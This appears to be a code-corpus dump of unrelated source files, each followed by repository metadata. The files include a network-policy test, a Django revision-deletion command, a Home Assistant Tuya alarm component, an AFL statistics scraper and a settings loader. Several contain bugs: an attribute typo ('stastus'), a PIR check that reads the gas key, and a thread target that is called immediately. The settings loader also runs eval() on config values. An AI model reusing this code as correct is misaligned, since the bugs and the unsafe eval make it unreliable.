l2p = self.gbpcfg.gbp_policy_cfg_all(
1, 'l2p', l2p_name, l3_policy_id=l3p_uuid)
if l2p == 0:
self._log.info(
"\n## Step 2B:New L2Policy Create Failed, hence "
"Testcase_gbp_l3p_func_4 ABORTED\n")
return 0
elif len(l2p) < 2:
self._log.info(
"\n## Step 2C: New L2Policy Create Failed due to "
"unexpected tuple length\n")
return 0
else:
l2p_uuid = l2p[0]
l2p_uuid_list.append(l2p_uuid)
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1, 'l2p', l2p_name, id=l2p_uuid,
l3_policy_id=l3p_uuid) == 0:
self._log.info(
"\n## Step 2D: Verify L2Policy using non-default "
"L3P == Failed")
return 0
i += 1
# Verify that non-default L3P has all the above create L2Ps
if self.gbpverify.gbp_obj_ver_attr_all_values(
'l3p', l3p_uuid, 'l2_policies', l2p_uuid_list) == 0:
self._log.info(
"\n## Step 2E: Verifying multiple L2Ps mapped to "
"non-default L3P == Failed \n")
return 0
# Delete all L2Ps and verify that non-default L3P has null L2Ps
self._log.info(
"\n## Step 3: Delete all L2Ps and verify that non-default "
"L3P has no L2P associated\n")
for l2pid in l2p_uuid_list:
if self.gbpcfg.gbp_policy_cfg_all(0, 'l2p', l2pid) == 0:
self._log.info(
"\n## Step 3: Delete of L2P %s == Failed\n" %
(l2pid))
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(1, 'l2p', l2pid) != 0:
self._log.info(
"\n## Step 3A: Verify that L2P got deleted == Failed\n")
return 0
if self.gbpverify.gbp_obj_ver_attr_all_values(
'l3p', l3p_uuid, 'l2_policies', l2p_uuid_list) != 0:
self._log.info(
"\n## Step 3B: Verifying Non-Default L3P has no more "
"L2P mapped == Failed \n")
return 0
self.test_gbp_l3p_func_1(name_uuid=l3p_uuid, rep_cr=2)
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_4: PASSED")
return 1
if __name__ == '__main__':
main()
| 41.735931 | 79 | 0.5014 | 2,301 | 19,282 | 3.982616 | 0.119513 | 0.042012 | 0.066019 | 0.068093 | 0.672959 | 0.625928 | 0.554343 | 0.539502 | 0.490506 | 0.38684 | 0 | 0.05039 | 0.374235 | 19,282 | 461 | 80 | 41.826464 | 0.7091 | 0.060108 | 0 | 0.519704 | 0 | 0 | 0.309936 | 0.055024 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017241 | false | 0.009852 | 0.017241 | 0 | 0.133005 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a848423e492401e4b81870e79dad04556d2ff579 | 6,166 | py | Python | onadata/apps/logger/management/commands/delete_revisions.py | ubpd/kobocat | 45906e07e8f05c30e3e26bab5570a8ab1ee264db | [
"BSD-2-Clause"
] | null | null | null | onadata/apps/logger/management/commands/delete_revisions.py | ubpd/kobocat | 45906e07e8f05c30e3e26bab5570a8ab1ee264db | [
"BSD-2-Clause"
] | null | null | null | onadata/apps/logger/management/commands/delete_revisions.py | ubpd/kobocat | 45906e07e8f05c30e3e26bab5570a8ab1ee264db | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
from __future__ import unicode_literals, print_function, division, absolute_import
from datetime import timedelta
import sys
from django.db import transaction, models, router, connection
from django.utils import timezone
from reversion.models import Revision, Version
from reversion.management.commands.deleterevisions import Command as RevisionCommand
class Command(RevisionCommand):
help = "Deletes revisions (by chunks) for a given app [and model]"
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
"--chunks",
default=1000,
type=int,
help="Delete only revisions by batch of `chunks` records.",
)
parser.add_argument(
"--vacuum",
action='store_true',
default=False,
help="Run `VACUUM` on tables after deletion.",
)
parser.add_argument(
"--vacuum-full",
action='store_true',
default=False,
help="Run `VACUUM FULL` instead of `VACUUM`.",
)
def handle(self, *app_labels, **options):
verbosity = options["verbosity"]
using = options["using"]
model_db = options["model_db"]
days = options["days"]
keep = options["keep"]
chunks = options["chunks"]
vacuum_full = options["vacuum_full"]
vacuum = options["vacuum"]
# Delete revisions.
using = using or router.db_for_write(Revision)
revisions_to_delete_count = 0
revision_query = models.Q()
keep_revision_ids = set()
# By default, delete nothing.
can_delete = False
# Get all revisions for the given revision manager and model.
for model in self.get_models(options):
if verbosity >= 1:
self.stdout.write("Finding stale revisions for {name}".format(
name=model._meta.verbose_name,
))
# Find all matching revision IDs.
model_query = Version.objects.using(using).get_for_model(
model,
model_db=model_db,
)
if keep:
overflow_object_ids = list(Version.objects.using(using).get_for_model(
model,
model_db=model_db,
).order_by().values_list("object_id").annotate(
count=models.Count("object_id"),
).filter(
count__gt=keep,
).values_list("object_id", flat=True).iterator())
# Only delete overflow revisions.
model_query = model_query.filter(object_id__in=overflow_object_ids)
for object_id in overflow_object_ids:
if verbosity >= 2:
self.stdout.write("- Finding stale revisions for {name} #{object_id}".format(
name=model._meta.verbose_name,
object_id=object_id,
))
# But keep the underflow revisions.
keep_revision_ids.update(Version.objects.using(using).get_for_object_reference(
model,
object_id,
model_db=model_db,
).values_list("revision_id", flat=True)[:keep].iterator())
# Add to revision query.
revision_query |= models.Q(
pk__in=model_query.order_by().values_list("revision_id", flat=True)
)
# If we have at least one model, then we can delete.
can_delete = True
if can_delete:
revisions_to_delete = Revision.objects.using(using).filter(
revision_query,
date_created__lt=timezone.now() - timedelta(days=days),
).exclude(
pk__in=keep_revision_ids
).order_by()
else:
revisions_to_delete = Revision.objects.using(using).none()
# Print out a message, if feeling verbose.
if verbosity >= 1:
revisions_to_delete_count = revisions_to_delete.count()
chunked_delete_ids = []
chunks_counter = 1
for revision_id in revisions_to_delete.values_list("id", flat=True).iterator():
chunked_delete_ids.append(revision_id)
if (chunks_counter % chunks) == 0 or chunks_counter == revisions_to_delete_count:
# Wrap into a transaction because of CASCADE, post_delete signals. (e.g. `revision_revision`)
with transaction.atomic(using=using):
chunked_revisions_to_delete = Revision.objects.filter(id__in=chunked_delete_ids)
if verbosity >= 1:
progress = "\rDeleting {chunk}/{total} revisions...".format(
chunk=chunks_counter,
total=revisions_to_delete_count
)
sys.stdout.write(progress)
sys.stdout.flush()
chunked_revisions_to_delete.delete()
chunked_delete_ids = []
chunks_counter += 1
# Carriage return
print("")
if vacuum is True or vacuum_full is True:
self._do_vacuum(vacuum_full)
print("Done!")
def _do_vacuum(self, full=False):
cursor = connection.cursor()
if full:
print("Vacuuming (full) table {}...".format(Revision._meta.db_table))
cursor.execute("VACUUM FULL {}".format(Revision._meta.db_table))
print("Vacuuming (full) table {}...".format(Version._meta.db_table))
cursor.execute("VACUUM FULL {}".format(Version._meta.db_table))
else:
print("Vacuuming table {}...".format(Revision._meta.db_table))
cursor.execute("VACUUM {}".format(Revision._meta.db_table))
print("Vacuuming table {}...".format(Version._meta.db_table))
cursor.execute("VACUUM {}".format(Version._meta.db_table))
connection.commit()
| 39.525641 | 109 | 0.567142 | 651 | 6,166 | 5.129032 | 0.258065 | 0.032944 | 0.050913 | 0.032944 | 0.299491 | 0.272537 | 0.194669 | 0.146152 | 0.090446 | 0.032345 | 0 | 0.003175 | 0.336036 | 6,166 | 155 | 110 | 39.780645 | 0.812408 | 0.071359 | 0 | 0.196721 | 0 | 0 | 0.106443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02459 | false | 0 | 0.057377 | 0 | 0.098361 | 0.057377 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a848bb27e6fc70b43ba99742234a08f7e151bf98 | 4,466 | py | Python | custom_components/tuya_v2/alarm_control_panel.py | nickw444/tuya-home-assistant | acdd69f7b56e4c1e225cdc146d68d48e2c79dafb | [
"MIT"
] | 1 | 2021-07-30T03:07:01.000Z | 2021-07-30T03:07:01.000Z | custom_components/tuya_v2/alarm_control_panel.py | nickw444/tuya-home-assistant | acdd69f7b56e4c1e225cdc146d68d48e2c79dafb | [
"MIT"
] | 3 | 2021-08-14T16:02:31.000Z | 2021-10-16T21:27:43.000Z | custom_components/tuya_v2/alarm_control_panel.py | nickw444/tuya-home-assistant | acdd69f7b56e4c1e225cdc146d68d48e2c79dafb | [
"MIT"
] | null | null | null | """Support for Tuya Alarm Control."""
import logging
from typing import Callable
from homeassistant.components.alarm_control_panel import DOMAIN as DEVICE_DOMAIN
from homeassistant.components.alarm_control_panel import (
SUPPORT_ALARM_TRIGGER,
AlarmControlPanelEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import STATE_ALARM_ARMING, STATE_ALARM_TRIGGERED
from homeassistant.core import HomeAssistant
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from tuya_iot import TuyaDevice, TuyaDeviceManager
from .base import TuyaHaDevice
from .const import (
DOMAIN,
TUYA_DEVICE_MANAGER,
TUYA_DISCOVERY_NEW,
TUYA_HA_DEVICES,
TUYA_HA_TUYA_MAP,
)
_LOGGER = logging.getLogger(__name__)
TUYA_SUPPORT_TYPE = [
"ywbj", # Smoke Detector
"rqbj", # Gas Detector
"pir", # PIR Detector
]
# Smoke Detector
# https://developer.tuya.com/en/docs/iot/s?id=K9gf48r5i2iiy
DPCODE_SMOKE_SENSOR_STATE = "smoke_sensor_state"
DPCODE_GAS_SENSOR_STATE = "gas_sensor_state"
DPCODE_PIR = "pir"
async def async_setup_entry(
hass: HomeAssistant, _entry: ConfigEntry, async_add_entities: AddEntitiesCallback
):
"""Set up tuya alarm dynamically through tuya discovery."""
_LOGGER.info("alarm init")
hass.data[DOMAIN][TUYA_HA_TUYA_MAP].update({DEVICE_DOMAIN: TUYA_SUPPORT_TYPE})
async def async_discover_device(dev_ids):
"""Discover and add a discovered tuya sensor."""
_LOGGER.info("alarm add->", dev_ids)
if not dev_ids:
return
entities = await hass.async_add_executor_job(_setup_entities, hass, dev_ids)
hass.data[DOMAIN][TUYA_HA_DEVICES].extend(entities)
async_add_entities(entities)
async_dispatcher_connect(
hass, TUYA_DISCOVERY_NEW.format(DEVICE_DOMAIN), async_discover_device
)
device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]
device_ids = []
for (device_id, device) in device_manager.device_map.items():
if device.category in TUYA_SUPPORT_TYPE:
device_ids.append(device_id)
await async_discover_device(device_ids)
def _setup_entities(hass: HomeAssistant, device_ids: list):
"""Set up Tuya Switch device."""
device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]
entities = []
for device_id in device_ids:
device = device_manager.device_map[device_id]
if device is None:
continue
if DPCODE_SMOKE_SENSOR_STATE in device.status:
entities.append(
TuyaHaAlarm(
device,
device_manager,
(
lambda d: STATE_ALARM_TRIGGERED
if d.status.get(DPCODE_SMOKE_SENSOR_STATE, 1) == "1"
else STATE_ALARM_ARMING
),
)
)
if DPCODE_GAS_SENSOR_STATE in device.status:
entities.append(
TuyaHaAlarm(
device,
device_manager,
(
lambda d: STATE_ALARM_TRIGGERED
if d.status.get(DPCODE_GAS_SENSOR_STATE, 1) == "1"
else STATE_ALARM_ARMING
),
)
)
if DPCODE_PIR in device.stastus:
entities.append(
TuyaHaAlarm(
device,
device_manager,
(
lambda d: STATE_ALARM_TRIGGERED
if d.status.get(DPCODE_GAS_SENSOR_STATE, "none") == "pir"
else STATE_ALARM_ARMING
),
)
)
return entities
class TuyaHaAlarm(TuyaHaDevice, AlarmControlPanelEntity):
"""Tuya Alarm Device."""
def __init__(
self,
device: TuyaDevice,
device_manager: TuyaDeviceManager,
sensor_is_on: Callable[..., str],
) -> None:
"""Init TuyaHaAlarm."""
super().__init__(device, device_manager)
self._is_on = sensor_is_on
@property
def state(self):
"""Return is alarm on."""
return self._is_on(self.tuya_device)
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
return SUPPORT_ALARM_TRIGGER
| 31.230769 | 85 | 0.628527 | 483 | 4,466 | 5.488613 | 0.248447 | 0.058846 | 0.05017 | 0.030177 | 0.246322 | 0.231234 | 0.231234 | 0.193512 | 0.193512 | 0.15579 | 0 | 0.002861 | 0.295567 | 4,466 | 142 | 86 | 31.450704 | 0.839797 | 0.060233 | 0 | 0.227273 | 0 | 0 | 0.019236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0 | 0.109091 | 0 | 0.190909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a849776d81c960774b6a444083c983385fa4a090 | 530 | py | Python | tests/test_texas_game.py | seaglex/texas | c22579b74fc0473cdc0a4892f7227d6e0a373470 | [
"MIT"
] | null | null | null | tests/test_texas_game.py | seaglex/texas | c22579b74fc0473cdc0a4892f7227d6e0a373470 | [
"MIT"
] | null | null | null | tests/test_texas_game.py | seaglex/texas | c22579b74fc0473cdc0a4892f7227d6e0a373470 | [
"MIT"
] | null | null | null | import unittest
from texas import texas_games
from texas.judge import TexasJudge
class TexasGameTestCase(unittest.TestCase):
def test_dividing_money(self):
judge = TexasJudge()
game = texas_games.NoLimitTexasGame(judge)
amounts = game._divide_the_money(500, [300, None, None, None], [0, 0, 1, 2])
self.assertEquals(list(amounts), [150, 350, 0, 0])
amounts = game._divide_the_money(500, [300, 400, 200, None], [0, 0, 1, 1])
self.assertEquals(list(amounts), [150, 250, 0, 100])
| 37.857143 | 84 | 0.669811 | 72 | 530 | 4.791667 | 0.472222 | 0.017391 | 0.098551 | 0.115942 | 0.353623 | 0.17971 | 0.17971 | 0 | 0 | 0 | 0 | 0.103774 | 0.2 | 530 | 13 | 85 | 40.769231 | 0.709906 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.090909 | false | 0 | 0.272727 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84b852a96578b68cecedef7453c37c2c7438549 | 8,940 | py | Python | prelim.py | RyanFrancis0/afl_graphs | c7da6be317cc148c1e442916c45692b20c9abf73 | [
"MIT"
] | 1 | 2020-06-16T05:59:51.000Z | 2020-06-16T05:59:51.000Z | prelim.py | RyanFrancis0/afl_graphs | c7da6be317cc148c1e442916c45692b20c9abf73 | [
"MIT"
] | null | null | null | prelim.py | RyanFrancis0/afl_graphs | c7da6be317cc148c1e442916c45692b20c9abf73 | [
"MIT"
] | null | null | null |
import statistics
import ast
import os
import matplotlib.pyplot as plt
import numpy as np
import urllib.request
from bs4 import BeautifulSoup
script_directory = str(os.path.dirname(os.path.realpath(__file__)))
file_name = "prelimsavefile.txt"
path_to_file = script_directory + '\\' + file_name
"""
README:
If last_season (see constants below) isn't the last season in the AFL in which prelims were played OR you haven't
run this file on this computer before (Because of the 120+ webpages that need to be accessed, the amount of
processing that needs to be done on that accessed data and the fact that 99.99% of the times you run this file
the data doesn't need updating I save the data to a txt file in the folder this program is in rather than
gather it anew):
1. change it to the correct season
2. uncomment the RETRIEVE DATA section below
3. run the program
4. close the graph that opens up
5. recomment that section
6. save this file
I could've made that above process automatic but couldn't be bothered/didn't want to bother afltables.com every time
someone runs this
"""
#Constants
last_season = 2020 #?
universalURL = 'https://afltables.com/afl/seas/{}.html'
year_started = 1990 # 1897<- interesting
colours = {"GoldCoast":"yellow", "Geelong":"royalblue", "Essendon":"red", "Carlton":"navy", "Collingwood":"black", "Melbourne":"lime", "Hawthorn":"brown", "Fitzroy":"grey", "St Kilda":"crimson", "Richmond":"yellow", "North Melbourne":"blue", "Western Bulldogs":"green", "Fremantle":"purple","Greater Western Sydney":"orange", "Brisbane Lions": "orangered", "Port Adelaide":"cyan", "West Coast":"darkgoldenrod", "Sydney":"deeppink", "Adelaide":"royalblue"} #ugh takes so long to write out
def getURL(url):
stream = urllib.request.urlopen(url)
text = stream.read().decode('utf-8')
stream.close()
return text
"""
Convert float to 2 decimal place percentage string with percent sign on the end
Input (float): f
returns (str): f * 100, rouded to 2 decimal, with percent symbol on end
"""
def p(f):
return str(round(100 * f, 2)) + '%'
with open(path_to_file, "r") as f:
clubs = ast.literal_eval(f.read())
#MAIN:
""" RETRIEVE DATA
clubs = {} # {"club":[[years total], [years won]]}
for k in range(year_started, last_season + 1):
text = getURL(universalURL.format(k))
soup = BeautifulSoup(text, 'html.parser')
tables = soup.findAll('table')
if tables[-2].text != "Grand Final":
#1987 & 1924
continue
flag = False
for i in tables:
if flag == True:
flag = False
data = i.findAll('tr')
team1 = data[0].find('a').text
team2 = data[1].find('a').text
if team1 == "Kangaroos":
team1 = "North Melbourne"
elif team1 == "Brisbane Bears":
team1 = "Brisbane Lions"
elif team1 == "Footscray":
team1 = "Western Bulldogs"
elif team1 == "South Melbourne":
team1 = "Sydney"
if team2 == "Kangaroos":
team2 = "North Melbourne"
elif team2 == "Brisbane Bears":
team2 = "Brisbane Lions"
elif team2 == "Footscray":
team2 = "Western Bulldogs"
elif team2 == "South Melbourne":
team2 = "Sydney"
if team1 in clubs:
clubs[team1][0].append(k)
else:
clubs[team1] = [[k], []]
if team2 in clubs:
clubs[team2][0].append(k)
else:
clubs[team2] = [[k], []]
if i.text == "Preliminary Final":
flag = True
gfdata = tables[len(tables) - 1].findAll('tr')
team1 = gfdata[0].find('a').text
team2 = gfdata[1].find('a').text
if team1 == "Kangaroos":
team1 = "North Melbourne"
elif team1 == "Brisbane Bears":
team1 = "Brisbane Lions"
elif team1 == "Footscray":
team1 = "Western Bulldogs"
elif team1 == "South Melbourne":
team1 = "Sydney"
if team2 == "Kangaroos":
team2 = "North Melbourne"
elif team2 == "Brisbane Bears":
team2 = "Brisbane Lions"
elif team2 == "Footscray":
team2 = "Western Bulldogs"
elif team2 == "South Melbourne":
team2 = "Sydney"
if team1 in clubs:
clubs[team1][1].append(k)
if k not in clubs[team1][0]:
clubs[team1][0].append(k)
else:
clubs[team1] = [[k], [k]]
if team2 in clubs:
clubs[team2][1].append(k)
if k not in clubs[team2][0]:
clubs[team2][0].append(k)
else:
clubs[team2] = [[k], [k]]
with open(path_to_file, "w") as f:
f.write(str(clubs))
#"""
all_clubs_windows = 0
all_club_window_lengths = []
all_clubs_prelim_distances = []
all_clubs_years_twixt_clusters = []
all_clubs_years_twixt_clusters_1990 = []
prelims_1990 = 0
club_windows_1990 = 0
club_window_lengths_1990 = []
club_prelim_distances_1990 = []
fig = plt.figure()
ax = fig.add_subplot(111, alpha=0.7)
for i in clubs:
ax.set_prop_cycle(color=colours[i])
year_finished = clubs[i][0][-1]
years_b4_pre = (clubs[i][0][0] - year_started) * [0]
years_since_pre = (last_season + 1 - year_finished) * [len(clubs[i][0])]
seasons = list(range(1, len(clubs[i][0]) + 1))
x = (len(years_b4_pre) * [clubs[i][0][0]]) + clubs[i][0] + [last_season + 1]
y = years_b4_pre + seasons + [len(clubs[i][0])]
wins_y = [seasons[clubs[i][0].index(k)] for k in clubs[i][1]]
ax.scatter(clubs[i][1], wins_y)
last = clubs[i][0][0]
record = [last]
total_windows = 0
window_lengths = []
years_between_prelims = np.diff(np.array(clubs[i][0])).tolist()
years_between_prelims.append(last_season + 1 - clubs[i][0][-1])
all_clubs_prelim_distances += years_between_prelims
years_between_clusters = []
years_between_clusters_1990 = []
flag = True
for k in clubs[i][0][1:]:
if k > 1990 and flag and clubs[i][0][0] < 1990:
years_between_clusters_1990.append(k - 1990)
flag = False
if k >= 1990:
prelims_1990 += 1
if last >= 1990:
club_prelim_distances_1990.append(k - last)
if k - last < 3: #
record.append(k)
last = k
if k != clubs[i][0][-1]:
continue
if k != record[-1]:
years_between_clusters.append(k - record[-1])
if record[-1] >= 1990:
years_between_clusters_1990.append(k - record[-1])
if len(record) > 1:
total_windows += 1
all_clubs_windows += len(record)
if (record[0] >= 1990):
club_windows_1990 += len(record)
club_window_lengths_1990.append(record[-1] + 1 - record[0])
window_lengths.append(record[-1] + 1 - record[0])
x2 = [record[0], record[-1]]
y2 = [y[x.index(record[0])], y[x.index(record[-1])]]
ax.set_prop_cycle(color=colours[i])
ax.plot(x2, y2, ':')
record = [k]
last = k
all_club_window_lengths += window_lengths
diff_last_Season_and_last_prelim = last_season + 1 - clubs[i][0][-1]
years_between_clusters.append(diff_last_Season_and_last_prelim)
years_between_clusters_1990.append(diff_last_Season_and_last_prelim)
club_prelim_distances_1990.append(diff_last_Season_and_last_prelim)
all_clubs_years_twixt_clusters += years_between_clusters
all_clubs_years_twixt_clusters_1990 += years_between_clusters_1990
ax.step(x, y, alpha=0.7, where='post', label=("{} {} {} {} {} {} {} {}".format(
i,
len(clubs[i][0]),
p(len(clubs[i][1])/len(clubs[i][0])),
total_windows,
round(statistics.mean(window_lengths), 2),
round(statistics.mean(years_between_prelims), 2),
round(statistics.mean(years_between_clusters), 2),
' ' #round(statistics.mean(years_between_clusters_1990), 2)
)))
ax.set_xticks([i for i in range(year_started - int(str(year_started)[-1]), (last_season + (last_season % 10) + 10), 10)])
plt.ylabel('Prelim Finals w/ wins as dots ')
'''+
p(club_windows_1990/prelims_1990) +
" " +
str(round(statistics.mean(club_window_lengths_1990), 2)) +
" " +
str(round(statistics.mean(club_prelim_distances_1990), 2)) +
" " +
str(round(statistics.mean(all_clubs_years_twixt_clusters_1990), 2))
)'''
plt.xlabel('Years')
plt.title("Prelim finals by club " +
p(all_clubs_windows/sum(len(clubs[i][0]) for i in clubs)) +
" " +
str(round(statistics.mean(all_club_window_lengths), 2)) +
" " +
str(round(statistics.mean(all_clubs_prelim_distances), 2)) +
" " +
str(round(statistics.mean(all_clubs_years_twixt_clusters), 2))
)
plt.legend()
plt.minorticks_on()
plt.grid(which='minor')
plt.grid(which='major', color="black")
plt.show() | 37.25 | 487 | 0.611409 | 1,219 | 8,940 | 4.326497 | 0.249385 | 0.023891 | 0.023891 | 0.020478 | 0.377892 | 0.300531 | 0.274744 | 0.188093 | 0.166098 | 0.142965 | 0 | 0.047321 | 0.248322 | 8,940 | 240 | 488 | 37.25 | 0.7375 | 0.013311 | 0 | 0.059322 | 0 | 0 | 0.096548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016949 | false | 0 | 0.059322 | 0.008475 | 0.09322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84c6f19fcf928a5eaad205c482d3ee5050bf93d | 1,377 | py | Python | com/shbak/effective_python/_01_example/_57_do_not_create_thread_when_fan_out/main.py | sanghyunbak/effective_python | e35d880c47e988607e4a11aa6eb6b62ae887688a | [
"Apache-2.0"
] | null | null | null | com/shbak/effective_python/_01_example/_57_do_not_create_thread_when_fan_out/main.py | sanghyunbak/effective_python | e35d880c47e988607e4a11aa6eb6b62ae887688a | [
"Apache-2.0"
] | null | null | null | com/shbak/effective_python/_01_example/_57_do_not_create_thread_when_fan_out/main.py | sanghyunbak/effective_python | e35d880c47e988607e4a11aa6eb6b62ae887688a | [
"Apache-2.0"
] | null | null | null | import contextlib
import io
from threading import Lock, Thread
from com.shbak.effective_python._01_example._56_when_need_concurrent.main import Grid, step_cell
ALIVE = '*'
EMPTY = '-'
class LockingGrid(Grid):
def __init__(self, height, width):
super().__init__(height, width)
self.lock = Lock()
def __str__(self):
with self.lock:
return super().__str__()
def get(self, y, x):
with self.lock:
return super().get(y, x)
def set(self, y, x, state):
with self.lock:
return super().set(y, x, state)
def simulated_threaded(grid):
next_grid = LockingGrid(grid.height, grid.width)
threads = []
for y in range(grid.height):
for x in range(grid.width):
args = (y, x, grid.get, next_grid.set)
thread = Thread(target=step_cell, args=args)
thread.start() # fan out
threads.append(thread)
for thread in threads:
thread.join() # fan in
return next_grid
def error_raise():
raise OSError('I/O problam occur!')
def thread_redirect_stderr_to_string_io():
fake_stderr = io.StringIO()
with contextlib.redirect_stderr(fake_stderr):
thread = Thread(target=error_raise())
thread.start()
thread.join()
if __name__ == '__main__':
thread_redirect_stderr_to_string_io()
| 22.95 | 96 | 0.626725 | 180 | 1,377 | 4.505556 | 0.377778 | 0.01233 | 0.04439 | 0.066584 | 0.159063 | 0.073983 | 0 | 0 | 0 | 0 | 0 | 0.003925 | 0.259985 | 1,377 | 59 | 97 | 23.338983 | 0.791953 | 0.010167 | 0 | 0.170732 | 0 | 0 | 0.020588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.097561 | 0 | 0.390244 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84dfd15f39f42c196fa2a0525db207d2d2d2d42 | 612 | py | Python | util/csv_format.py | lightfar125/lotto-predict | f8b5348dd8336609d24cefc57f237976a6a3f3da | [
"Unlicense"
] | 6 | 2020-04-01T03:09:19.000Z | 2022-01-18T14:43:58.000Z | util/csv_format.py | lightfar125/lotto-predict | f8b5348dd8336609d24cefc57f237976a6a3f3da | [
"Unlicense"
] | null | null | null | util/csv_format.py | lightfar125/lotto-predict | f8b5348dd8336609d24cefc57f237976a6a3f3da | [
"Unlicense"
] | 4 | 2020-01-29T06:26:24.000Z | 2022-01-14T12:12:57.000Z | # Process scraped csv into correct format
import csv
from pathlib import Path
from dateutil import parser
path = Path()
data_folder = 'data'
infile = path / data_folder / '2019.csv'
outfile = path / data_folder / '2019_formatted.csv'
with open(infile, 'r') as in_csv:
reader = csv.reader(in_csv, delimiter=',')
with open(outfile, 'w', newline='') as out_csv:
writer = csv.writer(out_csv, delimiter=',')
for r in reversed(list(reader)):
dt = parser.parse(r[0])
newrow = [dt.date(), r[1], r[2], r[3], r[4], r[5], r[6], r[7]]
writer.writerow(newrow)
| 27.818182 | 74 | 0.619281 | 92 | 612 | 4.032609 | 0.48913 | 0.06469 | 0.113208 | 0.097035 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033827 | 0.227124 | 612 | 21 | 75 | 29.142857 | 0.750529 | 0.063725 | 0 | 0 | 0 | 0 | 0.059545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84e19a2090b65754703d534e8ab228e0ef2d3d1 | 6,060 | py | Python | testsite/settings.py | djaodjin/djaodjin-multitier | 0d683cbdeca74dfe3bd3f2c5792dbdd2de52d639 | [
"BSD-2-Clause"
] | 8 | 2015-07-26T18:33:21.000Z | 2021-06-25T09:40:11.000Z | testsite/settings.py | djaodjin/djaodjin-multitier | 0d683cbdeca74dfe3bd3f2c5792dbdd2de52d639 | [
"BSD-2-Clause"
] | 8 | 2019-01-30T10:02:25.000Z | 2021-07-30T23:22:45.000Z | testsite/settings.py | djaodjin/djaodjin-multitier | 0d683cbdeca74dfe3bd3f2c5792dbdd2de52d639 | [
"BSD-2-Clause"
] | 5 | 2015-09-05T20:24:45.000Z | 2020-08-24T18:09:17.000Z | """
Django settings for testsite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_NAME = os.path.basename(BASE_DIR)
def load_config(confpath):
'''
Given a path to a file, parse its lines in ini-like format, and then
set them in the current namespace.
'''
# todo: consider using something like ConfigObj for this:
# http://www.voidspace.org.uk/python/configobj.html
import re, sys
if os.path.isfile(confpath):
sys.stderr.write('config loaded from %s\n' % confpath)
with open(confpath) as conffile:
line = conffile.readline()
while line != '':
if not line.startswith('#'):
look = re.match(r'(\w+)\s*=\s*(.*)', line)
if look:
value = look.group(2) \
% {'LOCALSTATEDIR': BASE_DIR + '/var'}
try:
# Once Django 1.5 introduced ALLOWED_HOSTS (a tuple
# definitely in the site.conf set), we had no choice
# other than using eval. The {} are here to restrict
# the globals and locals context eval has access to.
# pylint: disable=eval-used
setattr(sys.modules[__name__],
look.group(1).upper(), eval(value, {}, {}))
except Exception:
raise
line = conffile.readline()
else:
sys.stderr.write('warning: config file %s does not exist.\n' % confpath)
load_config(os.path.join(BASE_DIR, 'credentials'))
# Quick-start development settings - unsuitable for production
